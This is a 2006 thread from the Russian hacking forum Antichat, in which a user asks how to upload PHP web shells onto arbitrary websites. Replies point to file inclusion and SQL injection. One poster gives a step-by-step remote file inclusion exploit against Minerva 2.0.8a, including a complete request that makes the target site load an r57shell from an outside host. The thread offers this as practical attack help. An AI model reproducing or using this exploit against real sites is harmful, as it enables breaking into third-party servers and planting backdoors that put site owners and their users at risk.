Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Шеллы (https://forum.antichat.xyz/showthread.php?t=20925)

-=ka$at1k=- 25.06.2006 23:55

Шеллы
 
Где найти всякие shell.php для движков?
а точнее, как его туда залить (я имею ввиду любой движок, не конкретный).... Какие есть способы получения прав для заливки на сайт (форум) любых файлов с последующим их запуском? help!

Rebz 25.06.2006 23:57

ну что за вопросы пошли??
Цитата:

Где найти всякие shell.php для движков?
ответ: в папках с правами 777.
Цитата:

а точнее, как его туда залить
php-including, sql-injection

Zitt 26.06.2006 00:28

Helkern жжош а гугл на что
Вот качай ТУТ (ето сцылка) архив с набором шеллов!!!!

Как запускать ща покажу на примери инклудинга
(сущесьвует еще масса способов но етот имхо самый легкий)
Вот дапустим в Minerva 2.0.8a Build 237 есть ета бага
запрос такой

http://www.site.com/[Minerva_path]/stat_modules/users_age/module.php?phpbb_root_path=[evil_scripts]

Теперь ищеш пагу на Minerva. нашол. даёш такой запрос

http://www.site.com/[Minerva_path]/stat_modules/users_age/module.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt?
(вместо http://rst.void.ru/download/r57shell.txt мона подставить любую сцылку на шелл)

Всё у тя есть рабочий шелл!!!

Что то я увлёкся прям статья почти получилась)))))))

-=ka$at1k=- 26.06.2006 00:37

спасиба народ .... :) большое спасибо!!

m0nzt3r 28.06.2006 22:58

Zitt'у хватило терпения объяснить это все.Тема закрыта.
Топегстартер, научись пользовацца www.google.com


Время: 05:51